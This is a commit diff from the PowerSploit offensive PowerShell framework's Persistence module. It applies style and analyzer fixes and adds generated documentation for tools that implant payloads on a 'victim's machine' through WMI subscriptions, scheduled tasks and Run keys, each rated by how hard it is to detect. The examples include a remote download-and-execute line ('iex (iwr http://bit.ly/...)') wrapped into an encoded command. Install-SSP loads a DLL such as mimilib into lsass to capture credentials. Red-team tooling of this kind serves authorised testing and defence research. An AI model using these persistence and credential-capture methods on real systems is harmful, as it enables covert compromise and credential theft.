For ./Persistence/ :

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs

Persistence/Persistence.psm1

@@ -65,22 +65,24 @@ function New-ElevatedPersistenceOption
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
 
 .EXAMPLE
 
-    C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
 
 .LINK
 
 http://www.exploit-monday.com
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
         [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
         [Switch]
@@ -239,18 +241,20 @@ function New-UserPersistenceOption
 
 .EXAMPLE
 
-    C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
 
 .EXAMPLE
 
-    C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
 
 .LINK
 
 http://www.exploit-monday.com
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
         [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
@@ -401,9 +405,9 @@ function Add-Persistence
 
 .EXAMPLE
 
-    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
-    C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
-    C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
 
 Description
 -----------
@@ -411,10 +415,10 @@ function Add-Persistence
 
 .EXAMPLE
 
-    C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
-    C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
-    C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
-    C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
 
 Description
 -----------
@@ -425,7 +429,12 @@ function Add-Persistence
 http://www.exploit-monday.com
 #>
     
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]
+    [CmdletBinding()]
+    Param (
         [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
         [ValidateNotNullOrEmpty()]
         [ScriptBlock]
@@ -527,7 +536,6 @@ function Add-Persistence
 
 #region Initialize data
 
-    $CompressedScript = ''
     $UserTrigger = ''
     $UserTriggerRemoval = ''
     $ElevatedTrigger = "''"
@@ -785,7 +793,12 @@ if you are running a 64-bit OS. In order for the SSP dll to be loaded properly
 into lsass, the dll must export SpLsaModeInitialize.
 #>
 
-    [CmdletBinding()] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')]
+    [CmdletBinding()]
+    Param (
         [ValidateScript({Test-Path (Resolve-Path $_)})]
         [String]
         $Path
@@ -832,7 +845,7 @@ into lsass, the dll must export SpLsaModeInitialize.
 
         # Read offset to the PE Header (will be read in reverse)
         $FileStream.Read($lfanew,0,4) | Out-Null
-        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
+        $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
 
         # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
         $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
@@ -840,7 +853,7 @@ into lsass, the dll must export SpLsaModeInitialize.
 
         # Read compiled architecture
         $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
-        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
+        $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
         $FileStream.Close()
 
         if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
@@ -875,7 +888,7 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     # Get the dll filename without the extension.
     # This will be added to the registry.
-    $DllName = $Dll | % { % {($_ -split '\.')[0]} }
+    $DllName = $Dll | ForEach-Object { % {($_ -split '\.')[0]} }
 
     # Enumerate all of the currently installed SSPs
     $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' |
@@ -928,7 +941,8 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     if ([IntPtr]::Size -eq 4) {
         $StructSize = 20
-    } else {
+    }
+    else {
         $StructSize = 24
     }
 
@@ -939,7 +953,8 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     try {
         $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr)
-    } catch {
+    }
+    catch {
         $HResult = $Error[0].Exception.InnerException.HResult
         Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
         Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
@@ -948,12 +963,13 @@ into lsass, the dll must export SpLsaModeInitialize.
 
     if ($RuntimeSuccess) {
         Write-Verbose 'Installation and loading complete!'
-    } else {
+    }
+    else {
         Write-Verbose 'Installation complete! Reboot for changes to take effect.'
     }
 }
 
-function Get-SecurityPackages
+function Get-SecurityPackage
 {
 <#
 .SYNOPSIS
@@ -967,15 +983,17 @@ Optional Dependencies: None
 
 .DESCRIPTION
 
-Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages.
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
 It also parses the returned SecPkgInfo struct array.
 
 .EXAMPLE
 
-Get-SecurityPackages
+Get-SecurityPackage
 #>
 
-    [CmdletBinding()] Param()
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [CmdletBinding()]
+    Param()
 
     #region P/Invoke declarations for secur32.dll
     $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI')

docs/Persistence/Add-Persistence.md

@@ -0,0 +1,227 @@
+# Add-Persistence
+
+## SYNOPSIS
+Add persistence capabilities to a script.
+
+PowerSploit Function: Add-Persistence  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption  
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScriptBlock
+```
+Add-Persistence -ScriptBlock <ScriptBlock> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+### FilePath
+```
+Add-Persistence -FilePath <String> -ElevatedPersistenceOption <Object> -UserPersistenceOption <Object>
+ [-PersistenceScriptName <String>] [-PersistentScriptFilePath <String>] [-RemovalScriptFilePath <String>]
+ [-DoNotPersistImmediately] [-PassThru]
+```
+
+## DESCRIPTION
+Add-Persistence will add persistence capabilities to any script or scriptblock.
+This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
+
+Description
+-----------
+Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
+```
+
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+
+Description
+-----------
+Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs.
+elevated) determined at runtime.
+The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement.
+The final, encoded output is finally saved to .\EncodedPersistentScript.ps1
+
+## PARAMETERS
+
+### -ScriptBlock
+Specifies a scriptblock containing your payload.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -FilePath
+Specifies the path to your payload.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases: Path
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ElevatedPersistenceOption
+Specifies the trigger for the persistent payload if the target is running elevated.
+You must run New-ElevatedPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserPersistenceOption
+Specifies the trigger for the persistent payload if the target is not running elevated.
+You must run New-UserPersistenceOption to generate this argument.
+
+```yaml
+Type: Object
+Parameter Sets: (All)
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistenceScriptName
+Specifies the name of the function that will wrap the original payload.
+The default value is 'Update-Windows'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: Update-Windows
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PersistentScriptFilePath
+Specifies the path where you would like to output the persistence script.
+By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: "$PWD\Persistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RemovalScriptFilePath
+Specifies the path where you would like to output a script that will remove the persistent payload.
+By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: "$PWD\RemovePersistence.ps1"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DoNotPersistImmediately
+Output only the wrapper function for the original payload.
+By default, Add-Persistence will output a script that will automatically attempt to persist (e.g.
+it will end with 'Update-Windows -Persist').
+If you are in a position where you are running in memory but want to persist at a later time, use this option.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PassThru
+Outputs the contents of the persistent script to the pipeline.
+This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### None
+
+Add-Persistence cannot receive any input from the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.ScriptBlock
+
+If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script.
+
+## NOTES
+When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+

docs/Persistence/Get-SecurityPackage.md

@@ -0,0 +1,37 @@
+# Get-SecurityPackage
+
+## SYNOPSIS
+Enumerates all loaded security packages (SSPs).
+
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-SecurityPackage
+```
+
+## DESCRIPTION
+Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages.
+It also parses the returned SecPkgInfo struct array.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-SecurityPackage
+```
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+

docs/Persistence/Install-SSP.md

@@ -0,0 +1,60 @@
+# Install-SSP
+
+## SYNOPSIS
+Installs a security support provider (SSP) dll.
+
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Install-SSP [[-Path] <String>]
+```
+
+## DESCRIPTION
+Install-SSP installs an SSP dll.
+Installation involves copying the dll to
+%windir%\System32 and adding the name of the dll to
+HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-SSP -Path .\mimilib.dll
+```
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+The SSP dll must match the OS architecture.
+i.e.
+You must have a 64-bit SSP dll
+if you are running a 64-bit OS.
+In order for the SSP dll to be loaded properly
+into lsass, the dll must export SpLsaModeInitialize.
+
+## RELATED LINKS
+

docs/Persistence/New-ElevatedPersistenceOption.md

@@ -0,0 +1,235 @@
+# New-ElevatedPersistenceOption
+
+## SYNOPSIS
+Configure elevated persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-ElevatedPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+### PermanentWMIAtStartup
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-AtStartup]
+```
+
+### PermanentWMIDaily
+```
+New-ElevatedPersistenceOption [-PermanentWMI] [-Daily] -At <DateTime>
+```
+
+### ScheduledTaskOnIdle
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskAtLogon
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-AtLogon]
+```
+
+### ScheduledTaskHourly
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-ElevatedPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-ElevatedPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-ElevatedPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -PermanentWMI
+Persist via a permanent WMI event subscription.
+This option will be the most difficult to detect and remove.
+
+Detection Difficulty:        Difficult
+Removal Difficulty:          Difficult
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup, PermanentWMIDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskAtLogon, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable? 
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: PermanentWMIDaily, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskAtLogon, Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtStartup
+Starts the payload within 240 and 325 seconds of computer startup.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: PermanentWMIAtStartup
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+

docs/Persistence/New-UserPersistenceOption.md

@@ -0,0 +1,179 @@
+# New-UserPersistenceOption
+
+## SYNOPSIS
+Configure user-level persistence options for the Add-Persistence function.
+
+PowerSploit Function: New-UserPersistenceOption  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+### ScheduledTaskOnIdle
+```
+New-UserPersistenceOption [-ScheduledTask] [-OnIdle]
+```
+
+### ScheduledTaskHourly
+```
+New-UserPersistenceOption [-ScheduledTask] [-Hourly]
+```
+
+### ScheduledTaskDaily
+```
+New-UserPersistenceOption [-ScheduledTask] [-Daily] -At <DateTime>
+```
+
+### Registry
+```
+New-UserPersistenceOption [-Registry] [-AtLogon]
+```
+
+## DESCRIPTION
+New-UserPersistenceOption allows for the configuration of elevated persistence options.
+The output of this function is a required parameter of Add-Persistence.
+Available persitence options in order of stealth are the following: scheduled task, registry.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+```
+
+## PARAMETERS
+
+### -ScheduledTask
+Persist via a scheduled task.
+
+Detection Difficulty:        Moderate
+Removal Difficulty:          Moderate
+User Detectable? 
+No
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle, ScheduledTaskHourly, ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Registry
+Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
+Note: This option will briefly pop up a PowerShell console to the user.
+
+Detection Difficulty:        Easy
+Removal Difficulty:          Easy
+User Detectable? 
+Yes
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Daily
+Starts the payload daily.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Hourly
+Starts the payload hourly.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskHourly
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -At
+Starts the payload at the specified time.
+You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+```yaml
+Type: DateTime
+Parameter Sets: ScheduledTaskDaily
+Aliases: 
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OnIdle
+Starts the payload after one minute of idling.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ScheduledTaskOnIdle
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AtLogon
+Starts the payload upon any user logon.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: Registry
+Aliases: 
+
+Required: True
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+

docs/index.md

@@ -25,7 +25,7 @@ Add persistence capabilities to a PowerShell script.
     New-ElevatedPersistenceOption - Configure elevated persistence options for the Add-Persistence function.
     Add-Persistence - Add persistence capabilities to a script.
     Install-SSP - Installs a security support provider (SSP) dll.
-    Get-SecurityPackages - Enumerates all loaded security packages (SSPs).
+    Get-SecurityPackage - Enumerates all loaded security packages (SSPs).
 
 ### AntivirusBypass
 AV doesn't stand a chance against PowerShell!

mkdocs.yml

@@ -132,3 +132,10 @@ pages:
     - Functions:
         - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
         - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'
+- Persistence:
+    - Functions:
+        - New-ElevatedPersistenceOption: 'Persistence/New-ElevatedPersistenceOption.md'
+        - New-UserPersistenceOption: 'Persistence/New-UserPersistenceOption.md'
+        - Add-Persistence: 'Persistence/Add-Persistence.md'
+        - Install-SSP: 'Persistence/Install-SSP.md'
+        - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md'